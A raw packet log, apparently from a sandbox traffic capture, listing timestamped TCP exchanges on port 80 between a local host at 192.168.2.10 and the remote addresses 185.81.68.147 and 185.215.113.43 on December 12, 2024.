                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.676054955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.676789045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.676851988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.677098036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.677263021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.677323103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.678127050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.678298950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.678359032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.679203033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.680013895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.680074930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.680155993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.680167913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.680243015 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.681180000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.681509018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.681613922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.682213068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.682670116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.682733059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.683193922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.683532953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.683593035 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.684231997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.684401989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.684458971 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.685211897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.685471058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.685523033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.686249971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.686745882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.686800957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.687309027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.687392950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.687436104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.688266039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.688739061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.688800097 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.689306974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.689321041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.689358950 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.690356016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.690442085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.690480947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.691390991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.691410065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.691502094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.692351103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.692909956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.692965031 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.693357944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.693449974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.693502903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.694392920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.694499969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.694551945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.695385933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.695921898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.695976973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.696379900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.696485043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.696535110 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.697413921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.697695971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.697747946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.698524952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.698558092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.698595047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.699470997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.699620962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.699670076 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.700443983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.700586081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.700637102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.701462030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.701630116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.701695919 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.702593088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.702604055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.702662945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.703532934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.703901052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.703954935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.704451084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.769928932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.843847036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.843858957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.843935966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.844050884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.844212055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.844343901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.845189095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.845273018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.845331907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.846077919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.846806049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.847158909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.847165108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.847223997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.848187923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.848431110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.848484993 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.849179983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.849188089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.849255085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.850158930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.851202965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.851210117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.851269960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.851344109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.851397038 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.852190018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.852771044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.853004932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.853204012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.853377104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.853447914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.854326010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.855091095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.855210066 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.855304003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.855813026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.855907917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.856251955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.856393099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.856507063 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.857320070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.858191967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.858383894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.858741999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.859683037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.859692097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.859699011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.859754086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.859772921 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.860588074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.861356020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.861386061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.861392975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.861421108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.861443996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.862301111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.862478018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.862529993 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.863358021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.864289045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.864353895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.864368916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.864377022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.864423990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.865346909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.865525961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.865575075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.866405010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.866415024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.866492033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.867392063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.868114948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.868323088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.868443012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.868524075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.868621111 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.869431019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.869997978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.870094061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.870438099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.871129036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.871257067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.871423960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.871905088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.872073889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.872446060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.872997999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.873049974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.873465061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.873584032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.873653889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.874463081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.875416040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.875482082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.875544071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.875551939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.875598907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.876527071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.876646042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.876759052 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.877523899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.877959013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.878266096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.878532887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.879170895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.879230976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.879589081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.879915953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.879975080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.880613089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.880620956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.880671978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.881562948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.882262945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.882380962 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.882755041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.882862091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.882946014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.883640051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.883697033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.883748055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.884634972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.884721041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.884779930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.885725975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.886276007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.886327982 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.886662006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.887763977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.887772083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.887787104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.887823105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.887856007 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.888708115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.888757944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.888853073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.889694929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.889815092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.889878988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.890798092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.890805006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.890856028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.891716003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.891897917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.891959906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.892738104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.893183947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.893241882 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.893785954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.893961906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.894052982 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.894790888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.895190954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.895248890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.895838976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.895845890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.895904064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.896733046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.946631908 CET4995180192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.947655916 CET4997080192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.009725094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.036104918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.036185026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.036242962 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.036592960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.036803961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.036845922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.036928892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.037967920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.038214922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.038284063 CET4994680192.168.2.10185.81.68.147
